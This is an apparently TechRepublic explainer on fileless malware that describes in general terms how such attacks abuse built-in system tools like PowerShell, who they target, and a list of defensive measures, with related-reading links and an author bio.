Typical malware detection software functions based on signature detection or identifiable pieces of code that are unique to a particular type of infection. Other malware, such as ransomware, doesn't always leave a trace per se; however, through heuristics scanning, the behaviors specific to ransomware may be detected and halted, allowing users to take action to protect their data.
But how do you protect against an infection that does not have a signature that clearly identifies it or that performs a behavior that is out of the norm, such as encrypting hundreds of files per second? Furthermore, what can be done when the very commands and applications being called forth by the infection are native to the operating system and are used to perform actual management tasks?
These are characteristics of fileless malware, which is a type of malware that does not rely on virus-laden files to infect a host, but rather attacks a system from the inside to execute malicious code in resident memory. Its attack methods use stealth approaches to mask the commands it employs to not only keep access hidden, but also to conceal network traffic between infected hosts and remote command & control (C&C) servers, leaving a backdoor open for future malware attacks to occur.
This smart person's guide details what you need to know about fileless malware and the ways in which it operates, so that you may best protect against it.
- What is fileless malware? Fileless malware is a type of malware infection that uses a system's own trusted system files and services to obtain access to devices while evading detection. It may be paired with other malware types to deliver multiple payloads.
- Why does fileless malware matter? As malware continues to grow and evolve, the threats are becoming more sophisticated, and it is increasingly difficult to detect these threats, let alone stop them.
- Who does fileless malware affect? Fileless malware is targeting corporate networks, particularly financial institutions. However, given that threat actors are pairing this with other forms of malware to deliver additional payloads, it is expected to grow into something that affects all computers users— personal and businesses alike.
- When is fileless malware happening? Fileless malware, or memory-based malicious code that exists in RAM, has been around for quite some time. Though given some of the tools that are being used to manage systems, the invisible malware has seen a sharp increase in utilization in the past couple of years.
- How do I avoid infection by fileless malware? Fileless malware infections are extremely hard to detect without forensic software to confirm the compromise. Businesses can implement strategies to minimize the exposure to infection, or at the very least, mitigate the spread of the infection to other devices on shared networks.
SEE: Download: 10 ways to minimize fileless malware infections (TechRepublic)
What is fileless malware?
Fileless malware uses a system's built-in services, management commands, and applications to infect the host. By using the system's existing applications, a threat actor can leverage privilege escalation to execute commands used to manage the system (e.g., PowerShell) to create scripts that are run from the system's memory, making it appear as a normally running process that is virtually undetectable.
Attackers typically use these system commands to create hidden shares where they store scripts that have been used to compromise systems, such as creating network proxy connections; those connections are used to communicate with remote command & control (C&C) servers that are maintained by threat actors for additional payload delivery.
- Fileless malware: An undetectable threat (TechRepublic)
- The History of Fileless Malware (Lenny Zeltser)
- Fileless attacks against enterprise networks (Kaspersky Media)
- Increasing Fileless Malware Attacks (Comodo Security)
Why does fileless malware matter?
Let's face it, malware is not going away anytime soon. And with the prevalence of threat actors using their technical capabilities to attack business and personal networks, any advancements that allow them to exfiltrate data, encrypt user data in exchange for a ransom, or otherwise prevent access to services means it will take more effort and resources to secure devices on networks.
Fileless malware is especially worrisome because the infection vectors could be anything, but the indicators of compromise (IOC) can vary from infection to infection and depend on the attacker's goal. Infections are defined as an Advanced Volatile Threat (AVT) that can persist in the infected machine's memory, the registry, or combined with additional payloads for more targeted attacks in the future, such as inclusion as part of a group's botnet.
- Petya ransomware: Where it comes from and how to protect yourself (TechRepublic)
- Ukraine is a test bed for global cyberattacks that will target major infrastructure (TechRepublic)
- Former US security advisor: Cyberattacks damage society as much as physical infrastructure (TechRepublic)
- WannaCry: The smart person's guide (TechRepublic)
- Ebook: Cybersecurity in an IoT and mobile world (TechRepublic)
Who does fileless malware affect?
Fileless malware affects everyone that uses a computer. Based on attacks reported thus far, the main targets linked to compromises utilizing fileless malware have been networks in the financial sector. This is mainly due to the undetectable nature of the infection, which allows for stealthy data exfiltration to occur while leaving little trace the attack ever occurred.
- Do you work in the financial sector? Time to step up your cybersecurity habits (TechRepublic)
- A rash of invisible, fileless malware is infecting banks around the globe (Are Technica)
- Report: 2.5 million people fell victim to ransomware last year, up 11% from 2016 (TechRepublic)
- Data breach costs are dropping, but still $3.62 million on average, report says (TechRepublic)
- Report: Companies are wasting massive amounts of money on ineffective security solutions (TechRepublic)
- Network security policy (Tech Pro Research)
When is fileless malware happening?
Malicious code has existed for decades. Fileless malware is a relatively newer threat per se, but it's ultimately based on the concept of malicious code.
SEE: Video: Why organizations need ethical hackers now more than ever before (TechRepublic)
In recent years as malware attacks have increased, so have the tactics used by threat actors; fileless malware is one such tactic that has shown an increase in usage in the last couple of years. Given its adaptability to being joined with other types of malware for increasingly damaging payloads, recent stealth-based attacks paired fileless malware with ransomware to not only compromise a host, but also encrypt data and leave a backdoor for future attacks.
- Trends in targeted attacks (Kaspersky Daily)
- Report: 99.7% of web apps have at least one vulnerability (TechRepublic)
- After a decade of silence, this computer worm is back and researchers don't know why (ZDNet)
- One kind of Android smartphone ransomware is behind a massive rise in malicious software (ZDNet)
- Microsoft's Windows warning: Hackers hijacked software updater with in-memory malware (ZDNet)
- Poweliks Trojan goes fillers to evade detection and removal (ZDNet)
- 'Code Red': What went wrong? (ZDNet)
- Microsoft is building a smart antivirus using 400 million PCs (CNET)
How do I avoid infection by fileless malware?
Fileless malware is difficult to detect and, unfortunately, there is no surefire way to protect against it. There are several things to look out for that are based on a combination of known vectors of infection and the types of programs typically compromised to carry out attacks.
SEE: Computer Hacking Forensic Investigation & Penetration Testing Bundle (TechRepublic Academy)
Administrators and end users can work together to minimize the potential for infection, as well as mitigate exposure on affected systems. Follow this security plan:
- Keep patches up-to-date;
- Disable unnecessary services and program features;
- Uninstall nonessential applications;
- Install endpoint security;
- Restrict admin privileges;
- Monitor network traffic; and
- Provide security training to end users.
- Ebook: IT leader's guide to the threat of fileless malware (Tech Pro Research)
- Free security solution will block malware, zero-day attacks (TechRepublic)
- Understanding Fileless Malware (Heimdal Security)
- Protecting against Fileless Malware (McAfee)
- How to make your employees care about cybersecurity: 10 tips (TechRepublic)
- Protecting corporate data in the age of point-and-click malware begins with a healthy dose of realism (TechRepublic)
- Don't be the weak link that brings us all down: Keep your OS patched and up to date (TechRepublic)
- Digital forensics: The smart person's guide (TechRepublic)
- Security awareness and training policy (Tech Pro Research)
Jesus Vigo is a Network Administrator by day and owner of Mac|Jesus, LLC, specializing in Mac and Windows integration and providing solutions to small- and medium-size businesses. He brings 19 years of experience and multiple certifications from several vendors, including Apple and CompTIA.